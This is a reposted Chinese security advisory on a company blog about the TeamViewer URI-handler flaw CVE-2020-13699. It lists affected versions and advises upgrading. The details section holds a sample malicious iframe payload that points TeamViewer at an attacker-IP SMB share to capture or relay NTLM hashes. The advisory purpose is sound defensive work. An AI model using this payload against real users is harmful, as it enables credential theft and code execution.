本篇文章給大家分享的是有關(guān)怎么解析TeamViewer 用戶密碼破解漏洞，小編覺(jué)得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說(shuō)，跟著小編一起來(lái)看看吧。

我們提供的服務(wù)有：成都網(wǎng)站制作、做網(wǎng)站、外貿(mào)營(yíng)銷網(wǎng)站建設(shè)、微信公眾號(hào)開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認(rèn)證、海港ssl等。為1000+企事業(yè)單位解決了網(wǎng)站和推廣的問(wèn)題。提供周到的售前咨詢和貼心的售后服務(wù)，是有科學(xué)管理、有技術(shù)的海港網(wǎng)站制作公司

0x01 漏洞簡(jiǎn)述

2020年08月10日，360CERT監(jiān)測(cè)發(fā)現(xiàn)TeamViewer官方發(fā)布了TeamViewerURL處理的風(fēng)險(xiǎn)通告，該漏洞編號(hào)為CVE-2020-13699，漏洞等級(jí)：高危，漏洞評(píng)分：8.8分。
TeamViewer存在未引用的搜索路徑或元素的安全缺陷，更具體地說(shuō)，這是由于應(yīng)用程序沒(méi)有正確引用它的自定義URI處理程序，當(dāng)安裝了TeamViewer的易受攻擊版本的用戶訪問(wèn)惡意創(chuàng)建的網(wǎng)站時(shí)，可能會(huì)被黑客利用。

對(duì)此，360CERT建議廣大用戶及時(shí)將TeamViewer升級(jí)到15.8.3版本。與此同時(shí)，請(qǐng)做好資產(chǎn)自查以及預(yù)防工作，以免遭受黑客攻擊。

0x02 風(fēng)險(xiǎn)等級(jí)

360CERT對(duì)該漏洞的評(píng)定結(jié)果如下

評(píng)定方式	等級(jí)
威脅等級(jí)	高危
影響面	廣泛
360CERT評(píng)分	8.8分

0x03 漏洞詳情

TeamViewer主要用于遠(yuǎn)程訪問(wèn)和控制各種類型的計(jì)算機(jī)系統(tǒng)和移動(dòng)設(shè)備，但也提供協(xié)作和演示功能(例如，桌面共享、網(wǎng)絡(luò)會(huì)議、文件傳輸?shù)?。

TeamViewer存在未引用的搜索路徑或元素的安全缺陷，更具體地說(shuō)，這是由于應(yīng)用程序沒(méi)有正確引用它的自定義URI處理程序，當(dāng)安裝了TeamViewer的易受攻擊版本的系統(tǒng)訪問(wèn)惡意創(chuàng)建的網(wǎng)站時(shí)，可能會(huì)被利用，攻擊者可以使用精心制作的URL（iframesrc='teamviewer10:--play\\attacker-IP\share\fake.tvs'）將惡意iframe嵌入網(wǎng)站中，這將啟動(dòng)TeamViewerWindows桌面客戶端并強(qiáng)制其執(zhí)行以下操作：打開遠(yuǎn)程SMB共享。Windows在打開SMB共享時(shí)將執(zhí)行NTLM身份驗(yàn)證，并且可以將請(qǐng)求進(jìn)行轉(zhuǎn)發(fā)（使用諸如響應(yīng)程序之類的工具）以執(zhí)行代碼（或捕獲以進(jìn)行哈希破解）。

0x04 影響版本

TeamViewer<8.0.258861
TeamViewer<9.0.28860
TeamViewer<10.0.258873
TeamViewer<11.0.258870
TeamViewer<12.0.258869
TeamViewer<13.2.36220
TeamViewer<14.2.56676
TeamViewer<15.8.3

0x05 修復(fù)建議

通用修補(bǔ)建議：

升級(jí)到15.8.3版本，下載地址為：

Previous TeamViewer versions 10 – 11 – 12 – 13 – 14

https://www.teamviewer.com/en/download/previous-versions/

0x06 相關(guān)空間測(cè)繪數(shù)據(jù)

360安全大腦-Quake網(wǎng)絡(luò)空間測(cè)繪系統(tǒng)通過(guò)對(duì)全網(wǎng)資產(chǎn)測(cè)繪，發(fā)現(xiàn)TeamViewer在全球均有廣泛使用，具體分布如下圖所示。

0x07 產(chǎn)品側(cè)解決方案

360城市級(jí)網(wǎng)絡(luò)安全監(jiān)測(cè)服務(wù)

360安全大腦的QUAKE資產(chǎn)測(cè)繪平臺(tái)通過(guò)資產(chǎn)測(cè)繪技術(shù)手段，對(duì)該類漏洞進(jìn)行監(jiān)測(cè)，請(qǐng)用戶聯(lián)系相關(guān)產(chǎn)品區(qū)域負(fù)責(zé)人或(quake##)獲取對(duì)應(yīng)產(chǎn)品。

以上就是怎么解析TeamViewer 用戶密碼破解漏洞，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見(jiàn)到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

文章名稱：怎么解析TeamViewer用戶密碼破解漏洞
當(dāng)前地址：http://m.rwnh.cn/article12/jepsdc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供外貿(mào)建站、品牌網(wǎng)站設(shè)計(jì)、做網(wǎng)站、手機(jī)網(wǎng)站建設(shè)、域名注冊(cè)、商城網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)